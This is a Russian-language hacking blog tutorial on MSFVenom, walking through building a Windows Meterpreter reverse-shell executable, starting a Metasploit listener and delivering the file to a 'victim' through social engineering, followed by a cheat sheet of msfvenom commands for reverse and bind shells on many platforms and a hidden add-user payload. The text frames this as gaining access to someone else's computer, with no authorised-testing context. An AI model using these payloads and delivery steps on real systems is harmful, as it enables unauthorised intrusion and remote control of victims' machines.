Как использовать MSFVenom
Life-Hack [Жизнь-Взлом]/ХакингВ сегодняшней статье я покажу, как использовать MSFVenom. Вы узнаете, как создать полезную нагрузку (Payload) в MSFVenom. Также, приведу список всех команд MSFVenom.
Что такое MSFVenom
MSFVenom — бесплатный инструмент для создания полезной нагрузки (вредоносного файла). Это, так сказать, двоюродный брат Metasploit. С его помощью вы можете создавать различные полезные нагрузки, шелл-код и обратный шелл.
В далеком 2015 году он заменил инструменты MSFPayload и MSFEncode.

В новой версии MSFVenom появилась справка. Чтобы отобразить справку введите:
msfvenom -h

Как использовать MSFVenom
Reverse TCP (обратное подключение, обратный шелл, пейлоад), — схема взаимодействия с целевым компьютером. Говоря простым языком. Мы создаем вредоносный файл (полезную нагрузку), после запуска которого целевой компьютер будет пытаться подключиться к нашему компьютеру. Это называется «бэкконнект» или в нашем случае обратный шелл, потому что «бэкконнект» — это понятие растяжимое.
Чтобы узнать, какие полезные нагрузки доступны введите команду:
msf5> msfvenom -l payloads

Следующая команда создаст вредоносный исполняемый файл (обратный шелл), после запуска которого откроется сеанс Meterpreter.
LHOST— IP-адрес вашего компьютера (атакующего).LPORT— порт вашего компьютера, который назначен серверу или программе.P— сокращение от «payload», полезная нагрузка для выбранной платформы.F— параметр, который задает тип файла, например, exe для Windows.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.13 LPORT=4444 -f exe -a x64 -o /home/infosecaddicts/infoecaddicts.exe

Полезная нагрузка готова:

Мы создали пэйлоад, теперь переходим к следующему этапу. Запускаем msfconsole и вводим команды:
msf> use exploit/multi/handler msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp msf> set LHOST 192.168.1.13 msf> set LPORT 4444 msf> run
Необходимо ввести те же данные (IP-адрес и порт), которые были использованы при создании обратного шелла.
Этой операцией мы позволяем принять подключение от созданного нами ранее обратного шелла, который запустит жертва.

После создания вредоносного файла необходимо отправить его жертве. Вы можете использовать методы социальной инженерии или любой другой способ доставки вредоносного файла.
После запуска созданного файла откроется сессия Meterpreter:

Поздравляю, вы получили доступ к компьютеру.
Команды MSFVenom
При использовании MSFVenom всегда должна быть под рукой шпаргалка по командам:
Meterpreter reverse shell x86 multi stage
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elfLinux
Linux Meterpreter bind shell x86 multi stage
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf
Linux bind shell x64 single stage
msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf
Linux reverse shell x64 single stage
msfvenom -p linux/x64/shell_reverse_tcp RHOST=IP LPORT=PORT -f elf > shell.elf
Windows Meterpreter reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
Windows Meterpreter bind shell
msfvenom -p windows/meterpreter/bind_tcp RHOST= IP LPORT=PORT -f exe > shell.exe
Windows CMD Multi Stage
msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
Windows CMD Single Stage
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
Windows add user
msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe
Mac Reverse Shell
msfvenom -p osx/x86/shell_reverse_tcp LHOST=IP LPORT=PORT -f macho > shell.macho
Mac Bind shell
msfvenom -p osx/x86/shell_bind_tcp RHOST=IP LPORT=PORT -f macho > shell.macho
Python Shell
msfvenom -p cmd/unix/reverse_python LHOST=IP LPORT=PORT -f raw > shell.py
BASH Shell
msfvenom -p cmd/unix/reverse_bash LHOST=IP LPORT=PORT -f raw > shell.sh
PERL Shell
msfvenom -p cmd/unix/reverse_perl LHOST=IP LPORT=PORT -f raw > shell.pl
ASP Meterpreter shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f asp > shell.asp
JSP Shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=PORT -f raw > shell.jsp
WAR Shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=PORT -f war > shell.war
PHP Reverse Shell
msfvenom -p php/reverse_php LHOST=IP LPORT=PORT -f raw > phpreverseshell.php
Мы создали полезную нагрузку для Windows, но мы можем создать пейлоад для любой другой операционной системы, например: Android, iOS, Liniux и т. д. Все это позволяет сделать MSFVenom.
На этом все. Теперь вы знаете, как использовать MSFVenom.